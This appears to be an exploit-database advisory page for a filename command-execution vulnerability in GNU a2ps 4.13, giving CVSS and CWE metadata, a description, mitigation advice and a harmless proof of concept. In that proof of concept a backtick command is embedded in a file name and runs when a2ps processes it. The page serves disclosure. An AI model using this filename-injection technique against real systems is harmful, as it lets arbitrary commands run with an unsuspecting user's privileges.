header-logo
Suggest Exploit
vendor:
a2ps
by:
Unknown
7.5
CVSS
HIGH
Command Execution
78
CWE
Product Name: a2ps
Affected Version From: 4.13
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: a:gnu:a2ps:4.13
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

GNU a2ps Filename Command-Execution Vulnerability

GNU a2ps is affected by a filename command-execution vulnerability. This issue is due to the application's failure to properly sanitize filenames.An attacker might leverage this issue to execute arbitrary shell commands with the privileges of an unsuspecting user running the vulnerable application.Although this issue reportedly affects only a2ps version 4.13, other versions are likely affected as well.$ touch 'x`echo >&2 42`.c'$ a2ps -o /dev/null *.c42[x`echo >&2 42`.c (C): 0 pages on 0 sheets][Total: 0 pages on 0 sheets] saved into the file `/dev/null'

Mitigation:

It is recommended to update to the latest version of a2ps or apply the appropriate patch when available. Additionally, users should exercise caution when handling files with potentially malicious filenames.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11025/info

Reportedly GNU a2ps is affected by a filename command-execution vulnerability. This issue is due to the application's failure to properly sanitize filenames.

An attacker might leverage this issue to execute arbitrary shell commands with the privileges of an unsuspecting user running the vulnerable application.

Although this issue reportedly affects only a2ps version 4.13, other versions are likely affected as well. 

$ touch 'x`echo >&2 42`.c'
$ a2ps -o /dev/null *.c
42
[x`echo >&2 42`.c (C): 0 pages on 0 sheets]
[Total: 0 pages on 0 sheets] saved into the file `/dev/null'

Navigation

Suggest Exploit

Services By CQR

cqrsecured